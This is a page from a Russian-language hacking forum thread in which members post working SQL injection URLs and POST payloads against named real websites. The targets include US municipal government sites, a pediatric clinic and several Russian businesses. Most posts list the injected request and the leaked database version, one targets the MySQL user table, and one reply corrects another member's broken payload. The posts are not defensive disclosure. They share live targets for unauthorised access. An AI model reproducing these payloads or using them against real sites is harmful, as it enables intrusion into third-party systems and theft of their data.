HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #15281  
Старый 02.11.2012, 14:12
vaddd
Познающий
Регистрация: 06.01.2009
Сообщений: 69
Провел на форуме:
116125

Репутация: 3
По умолчанию

http://www.tristateracer.com/Results/resultspage.php?Year=-1488%27%20union%20select%201,table_name,3,4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18%20from%20informatio n_schema.tables;+--+

для получения резалта - жмякаем "January"
 
Ответить с цитированием

  #15282  
Старый 03.11.2012, 20:54
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Да здравствует FOREX

Выкладываю с учётом того, что данная SQL лежит под жестоким WAF и не несёт смысла в раскрутке.

MsAccess

Site: www.wmfx.us

Inject:

Код:
Code:
_ttp://www.wmfx.us/English/forex.asp?ID=5+or+1=1
Код:
Code:
http://www.wmfx.us/English/forex.asp?ID=5+group+by+1+having+1=1

��ͼִ�еIJ�ѯ�в�����Ϊ�ϼƺ���һ���ֵ��ض����ʽ 'ID' �� 

/English/forex.asp���� 277
Код:
Code:
http://www.wmfx.us/English/forex.asp?ID=5+group+by+1,id,AboutNameEn,ContentEn,GroupID,Exclusive,ClickNumber+having+1=1
PR и TYC 0, Alexa очень высокий

Сайт "на чисто поглазеть..."
 
Ответить с цитированием

  #15283  
Старый 05.11.2012, 13:06
.while
Новичок
Регистрация: 22.02.2010
Сообщений: 5
Провел на форуме:
27699

Репутация: 2
Отправить сообщение для .while с помощью ICQ
По умолчанию

Site : GroupFo.ru

PR : 0, TY : 0.

Сайт партнерской программы.

Post:

Цитата:
Сообщение от None  
http://groupfo.ru/reg.htm
Data:

Цитата:
Сообщение от None  
answer=5&email=3&icq=3&invait=-1 OR 1=1 AND 1=(SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT+%40%40VERSION), 9,1)),0)>0),1,2))--%20&reg_button=+%d0%a0%d0%b5%d0%b3%d0%b8%d1%81%d1% 82%d1%80%d0%b0%d1%86%d0%b8%d1%8f+&rlogin=3&rpass=3 &rpass_r=3&wmid=3&wmr=3
 
Ответить с цитированием

  #15284  
Старый 08.11.2012, 13:03
AC//DC
Познающий
Регистрация: 28.07.2009
Сообщений: 98
Провел на форуме:
247684

Репутация: 136
По умолчанию

http://www.svr-oskol.ru/rus/?cid=-3%20and%201=2%20union%20select%20@@version,2--&lng=ru

5.1.65-cll
 
Ответить с цитированием

  #15285  
Старый 10.11.2012, 13:42
MaxFast
Guest
Сообщений: n/a
Провел на форуме:
178623

Репутация: 94
По умолчанию

GOV, PR 4

Код:
Code:
http://www.murrayky.gov/showevent.htm?ID=-123+union+select+1,2,3,4,concat(database(),0x3a,version()),6,7,8,9,10,11,12,13,14,15,16--


citybusiness:5.0.51a-community


GOV, PR 4

Код:
Code:
http://www.newportky.gov/HPO_east_row_gudielines_porches.php?secid=-139+union+select+1,2,concat(database(),0x3a,version()),4,5,6,7--


info:4.0.25
 
Ответить с цитированием

  #15286  
Старый 10.11.2012, 22:11
bigest
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию

Цитата:
Сообщение от None  
http://www.raleighpediatrics.com/index.php?pId=-1+union+select+1,2,3,4--
админка
 
Ответить с цитированием

  #15287  
Старый 11.11.2012, 15:23
fox*card
Guest
Сообщений: n/a
Провел на форуме:
963

Репутация: 0
По умолчанию

http://www.adventure3.com/promos/cg/brand_products.php?subcat_id=571-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18--
 
Ответить с цитированием

  #15288  
Старый 11.11.2012, 15:32
_Pantera_
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546

Репутация: 1327
Отправить сообщение для _Pantera_ с помощью ICQ
По умолчанию

Цитата:
Сообщение от fox*card  
fox*card said:
http://www.adventure3.com/promos/cg/brand_products.php?subcat_id=571-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18--
Чувак, ты не правильно составил запрос.

Код:
Code:
http://www.adventure3.com/promos/cg/brand_products.php?subcat_id=5+union+select+1,2,3,4,version(),6,7--
5.0.95-log - дальше все стандартно
 
Ответить с цитированием

  #15289  
Старый 11.11.2012, 15:33
fox*card
Guest
Сообщений: n/a
Провел на форуме:
963

Репутация: 0
По умолчанию

http://bbs.myhack58.com/read.php?tid=290684-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4-- [0:0]
 
Ответить с цитированием

  #15290  
Старый 11.11.2012, 15:49
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию

autoinscale.com

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.autoinscale.com/?section=article&id=64+or+1+group+by+concat%28%28select+user+from+mysql.user%29,0x00,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+[/COLOR][/COLOR] 
(CY)40

(PR)3

5.0.26-log


=============================================

ridel-holding.com

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//ridel-holding.com/prom/view_price.php?id=-4%27+union+select+version%28%29,2--+[/COLOR][/COLOR] 
(CY) 20

(PR) 1

4.0.26


=============================================

spectehsnab.ru

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.spectehsnab.ru/index1.php?id=269+or+1+group+by+concat%28%28select+version%28%29%29,0x00,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+[/COLOR][/COLOR] 
(CY) 0

(PR) 2

5.1.60


=============================================

newrzhev.ru

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.newrzhev.ru/articles.php?id=173+or+1+group+by+concat%28%28select+version%28%29%29,0x00,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+[/COLOR][/COLOR] 
(CY) 40

(PR) 3

5.5.24-0ubuntu0.12.04.1


==============================================

ssrb.ru

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.ssrb.ru/enterprise/?c=&id=18392%27+or+1+group+by+concat%28%28select+version%28%29%29,0x00,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+[/COLOR][/COLOR] 
5.1.63-0+squeeze1

(CY) 70


==============================================

industr.ru

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.industr.ru/news/index.php?id=15265+or+1+group+by+concat%28%28select+version%28%29%29,0x00,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+[/COLOR][/COLOR] 
5.1.65-cll

(CY)130

(PR)3


==============================================
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ